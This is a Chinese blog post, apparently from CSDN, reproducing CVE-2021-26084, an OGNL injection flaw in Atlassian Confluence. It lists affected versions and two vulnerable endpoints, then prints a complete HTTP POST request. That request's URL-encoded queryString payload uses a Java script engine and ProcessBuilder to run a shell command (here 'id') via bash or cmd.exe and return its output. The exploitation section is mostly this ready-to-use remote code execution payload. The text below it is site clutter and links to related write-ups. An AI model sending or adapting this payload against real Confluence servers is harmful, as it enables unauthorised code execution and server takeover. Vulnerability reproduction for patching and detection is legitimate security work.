Atlassian Confluence OGNL表达式注入命令执行漏洞(CVE-2021-26084)漏洞复现

已于 2024-01-16 14:57:54 修改
阅读量460 收藏 7
点赞数 7
文章标签: atlassian 安全 web安全
于 2024-01-16 14:52:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64366018/article/details/135624604
版权

0x01漏洞概述

Confluence Server和Confluence Data Center上存在一个OGNL注入漏洞,漏洞编号为CVE-2021-26084。该漏洞允许经过身份验证或在某些情况下未授权的攻击者,在Confluence Server或Confluence Data Center上执行任意代码。

0x02影响版本

  • Atlassian Confluence Server/Data Center < 6.13.23

Atlassian Confluence Server/Data Center < 7.4.11

Atlassian Confluence Server/Data Center < 7.11.6

Atlassian Confluence Server/Data Center < 7.12.5

Atlassian Confluence Server/Data Center < 7.13.0

    0x03漏洞检测

  • 本漏洞有多个接口可以触发
  • /pages/doenterpagevariables.action
/pages/createpage-entervariables.action
    /pages/doenterpagevariables.action

    表达式成功解析

 /pages/createpage-entervariables.action

 表达式成功解析

0x04漏洞利用

!!!(注意,另外一个接口也是这样用,就不多截图了,有需要的师傅可以自己改接口就行)

POST /pages/createpage-entervariables.action?SpaceKey=X HTTP/1.1
Host: ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1070

queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022id%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027

柯达_
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
companion-linux:适用于 Linux 的非官方 Atlassian Confluence Companion App
05-31
适用于 Linux 的 Confluence Companion 应用程序 适用于 Linux 的 Companion App 是 (最初仅适用于 Windows 和 MacOS)的非官方端口,用于在 Linux 客户端上使用。 它基本上只是一个很小的python脚本(〜400行)。 借助配套应用程序,您可以使用首选(本地安装的)桌面应用程序。 如果文件在磁盘上发生更改,配套应用程序将自动将文件上传到 Confluence。 Debian软件包安装(Debian / Ubuntu / Mint) 从 Github 上的下载并安装.deb包。 安装完成后,请注销并重新登录。 然后脚本会自动启动。 在您的 Web 浏览器中打开 Confluence,打开一个文档并单击“编辑”。 配套脚本将显示一个 GUI 对话框,询问您是否要信任该站点。 单击“是”。 现在您可以编辑文件。 手动安装
Confluence 修复 CVE-2021-26084 OGNL注入漏洞
weixin_56306210的博客
06-21 1570
Confluence 修复 CVE-2021-26084 OGNL注入漏洞
Atlassian Confluence OGNL表达式注入代码执行漏洞CVE-2021-26084
wangqiao258的博客
10-13 2871
环境搭建: 使用vulhub,进入文件夹启动环境: docker-compose up -d 环境启动后,访问http://your-ip:8090即可进入安装向导,参考CVE-2019-3396这个环境中的安装方法,申请试用版许可证。在填写数据库信息的页面,PostgreSQL数据库地址为db,数据库名称confluence,用户名密码均为postgres。 漏洞复现: POST /pages/createpage-entervariables.action HTTP/1.1 Host: 192.168
通报:Confluence远程代码执行漏洞CVE-2021-26084)被黑产大规模利用
qcloud_security的博客
09-06 1766
8月26日,Atlassian官方发布公告,披露了一个Atlassian Confluence 远程代码执行漏洞CVE-2021-26084),攻击者利用漏洞可完全控制服务器。8月31日晚,腾讯云原生安全漏洞检测响应平台通过主机安全(云镜)检测到首个利用该漏洞的在野攻击案例。 腾讯安全旗下全系列企业级产品均已支持检测防御利用Atlassian Confluence远程代码执行漏洞的攻击活动。 腾讯云上安全产品全栈提供针对Confluence远程代码执行漏洞的检测防护能力,政企用户运维人员.
confluence的几个高危漏洞复现
fly夏天的博客
12-06 3617
CVE-2021-26084 CVE-2022-26134 漏洞复现
CVE-2022-26134】Confluence OGNL RCE 漏洞
weixin_45742777的博客
09-09 7466
CVE-2022-26134】Confluence OGNL RCE 漏洞
漏洞分析|Atlassian Confluence Data Center & Server 存在访问控制缺陷漏洞 (CVE-2023-22515)
xuandaoren的博客
10-12 1102
Confluence 提供了一个集中式的团队协作环境,使团队成员能够共享文档、项目计划、任务列表、会议记录等信息,并进行实时协作和交流。Confluence Data Center 支持集群部署,可以在多个服务器上进行负载均衡,提高系统的容错性和性能。我们可以在下面看到,SetupCheckInterceptor将进行测试BootstrapUtils.getBootstrapManager().isSetupComplete()作为检查的一部分,以确定 Confluence 服务器是否已设置。
CVE-2022-26134 Confluence远程命令执行漏洞复现
weixin_48421613的博客
06-05 5569
CVE-2022-26134 Confluence远程命令执行漏洞复现
Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527)安全风险通告
最新发布
smellycat000的专栏
01-16 646
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Atlassian Confluence 远程代码执行漏洞漏洞编号QVD-2024-2746,CVE-2023-22527公开时间2024-01-16影响量级十万级奇安信评级高危CVSS 3.1分数10.0威胁类型代码执行利用可能性高POC状态未公开在野利用状态未发现EXP状态未公开技术细节状态未公开危害描述:未经身份验证的远程攻击者可以...
confluence注入漏洞
zzf9347的博客
03-18 343
Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。经过查找资料发现,这是confluence的一个漏洞,名称叫做注入漏洞,编号:CVE-2021-26084。这台confluence应用的访问是用nginx做的反向代理,没法直接访问,也没有直接开放访问端口。排查nginx代理服务器的访问日志,发现有几个异常ip访问了。重启后,继续观察,发现再有相关路径的访问全部被拦截。
docker-atlassian-confluence:打包在Docker映像中的Atlassian Confluence
02-16
docker run --detach --publish 8090:8090 cptactionhank/atlassian-confluence:latest 然后只需将您喜欢的浏览器导航到http://[dockerhost]:8090并完成配置。 配置 您可以通过提供以下环境变量来配置少量内容 环境...
docker-atlassian-confluence-data-center:Dockerized Atlassian Confluence Data Center 用于插件开发期间的本地测试
05-29
Docker Atlassian Confluence 数据中心 使用 Docker 启动,以便在插件开发期间进行本地测试。 它启动一个PostgreSQL数据库,几个Confluence群集节点和Apache2 HTTPD作为粘性会话负载平衡器。 共享的 confluence-...
atlassian-confluence-6.15.1-x64.bin.tar.gz
10-21
atlassian-confluence-6.15.1-x64.bin.tar.gz
Atlassian-Confluence-Trojan:Atlassian-Confluence-Trojan
05-17
Atlassian-Confluence-Trojan Ref: Atlassian-Confluence-Trojan Get a shell by deploy this Trojan-Marco 制作方法: 先将quote-macro-1.0.jar解压 将 UpdateMethod.java 中的{path}替换为目录的绝对路径 然后...
CVE-2021-26084——Confluence OGNL 注入漏洞分析
战神/calmness的博客
09-04 2138
简述 2021年08月26日,Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2021-26084漏洞等级:严重,漏洞评分:8.8。目前该漏洞安全补丁已更新。 ConfluenceAtlassian公司的一个专业的企业知识管理与协同软件,也可以用于构建企业wiki,因此,Confluence的使用面很广。在某些情况下,未授权的攻击者可以构造特殊的请求,造成远程代码执行。 影响版本 组件
Confluence Server Webwork 预身份验证 OGNL 注入CVE-2021-26084
weixin_56537388的博客
11-23 238
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业 wiki。存在一个 OGNL 注入漏洞,允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。
Atlassian Confluence 远程代码执行漏洞复现CVE-2021-26084
0xSec
01-17 1247
Atlassian ConfluenceAtlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。
Atlassian Confluence 路径遍历和命令执行漏洞CVE-2019-3396)
weixin_56537388的博客
11-23 245
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业 wiki。Atlassian Confluence 6.14.2 版本之前存在一个未经授权的目录遍历漏洞,攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令
Confluence 漏洞分析排查
dayouzi的博客
08-14 200
Confluence Server 和 Data Center 中的 Widget Connector 中存在服Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。1、其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令
cve-2020-5398 怎么修复
05-30
CVE-2020-5398是Atlassian Crowd中的一项安全漏洞,攻击者可以利用此漏洞执行未经授权的代码。为了修复此漏洞,您需要执行以下步骤: 1. 下载并安装Crowd的最新版本 2. 如果您正在使用Crowd SSO,您需要更新所有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值